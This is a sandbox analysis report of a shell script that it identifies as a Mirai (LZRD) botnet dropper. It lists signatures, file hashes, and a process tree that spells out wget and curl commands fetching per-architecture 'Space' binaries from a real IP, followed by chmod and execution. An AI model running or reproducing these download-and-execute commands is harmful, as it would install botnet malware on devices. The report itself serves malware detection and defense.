Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    22/12/2024, 12:41

General

  • Target

    1.sh

  • Size

    2KB

  • MD5

    8364b34731a2e12ce67c2cfcb2811e75

  • SHA1

    5d718457dfa0ecc1a46528696d2769d11adf018f

  • SHA256

    cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea

  • SHA512

    ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 6 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 10 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/1.sh
    /tmp/1.sh
    1⤵
    • Writes file to tmp directory
    PID:1475
    • /bin/cp
      cp /bin/busybox /tmp/
      2⤵
      • Writes file to tmp directory
      PID:1476
    • /usr/bin/wget
      wget http://154.216.20.221/hiddenbin/Space.arc
      2⤵
      • Writes file to tmp directory
      PID:1477
    • /usr/bin/curl
      curl -O http://154.216.20.221/hiddenbin/Space.arc
      2⤵
      • Writes file to tmp directory
      PID:1489
    • /bin/cat
      cat Space.arc
      2⤵
        PID:1490
      • /bin/chmod
        chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
        2⤵
        • File and Directory Permissions Modification
        PID:1491
      • /tmp/Space
        ./Space
        2⤵
        • Executes dropped EXE
        PID:1492
      • /usr/bin/wget
        wget http://154.216.20.221/hiddenbin/Space.x86
        2⤵
        • Writes file to tmp directory
        PID:1494
      • /usr/bin/curl
        curl -O http://154.216.20.221/hiddenbin/Space.x86
        2⤵
        • Writes file to tmp directory
        PID:1495
      • /bin/cat
        cat Space.x86
        2⤵
          PID:1496
        • /bin/chmod
          chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
          2⤵
          • File and Directory Permissions Modification
          PID:1497
        • /tmp/Space
          ./Space
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1498
        • /usr/bin/wget
          wget http://154.216.20.221/hiddenbin/Space.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1511
        • /usr/bin/curl
          curl -O http://154.216.20.221/hiddenbin/Space.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1512
        • /bin/chmod
          chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
          2⤵
          • File and Directory Permissions Modification
          PID:1514
        • /tmp/Space
          ./Space
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1515
        • /usr/bin/wget
          wget http://154.216.20.221/hiddenbin/Space.i686
          2⤵
          • Writes file to tmp directory
          PID:1521
        • /usr/bin/curl
          curl -O http://154.216.20.221/hiddenbin/Space.i686
          2⤵
          • Writes file to tmp directory
          PID:1522
        • /bin/chmod
          chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
          2⤵
          • File and Directory Permissions Modification
          PID:1524
        • /tmp/Space
          ./Space
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1525
        • /usr/bin/wget
          wget http://154.216.20.221/hiddenbin/Space.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:1531
        • /usr/bin/curl
          curl -O http://154.216.20.221/hiddenbin/Space.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:1532
        • /bin/chmod
          chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
          2⤵
          • File and Directory Permissions Modification
          PID:1534
        • /tmp/Space
          ./Space
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1535
        • /usr/bin/wget
          wget http://154.216.20.221/hiddenbin/Space.mips64
          2⤵
          • System Network Configuration Discovery
          PID:1541
        • /usr/bin/curl
          curl -O http://154.216.20.221/hiddenbin/Space.mips64
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:1542
        • /bin/chmod
          chmod +x 1.sh busybox config-err-G4apKo netplan_iqgixu2l snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-kY8Foy
          2⤵
          • File and Directory Permissions Modification
          PID:1544
        • /tmp/Space
          ./Space
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1545
        • /usr/bin/wget
          wget http://154.216.20.221/hiddenbin/Space.mpsl
          2⤵
            PID:1551

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/Space

          Filesize

          37KB

          MD5

          b73e8fbb7aee4bbe5902554d6ab22092

          SHA1

          620097bfd55d8ade8d138bb2ba10e8d4c43fd105

          SHA256

          22dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04

          SHA512

          d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8

        • /tmp/Space.arc

          Filesize

          113KB

          MD5

          0fdd3e751fa9d0f60c5a218e4269c9ad

          SHA1

          0d9ae7d06494f59cfc3bfba8e162e29630159be3

          SHA256

          81749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528

          SHA512

          2b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de

        • /tmp/busybox

          Filesize

          2.0MB

          MD5

          b4dede5fc0b1bad5cb8e901bde126b97

          SHA1

          10cbe9a418ad84a1ed297948539d37aeb58dd810

          SHA256

          a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

          SHA512

          45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6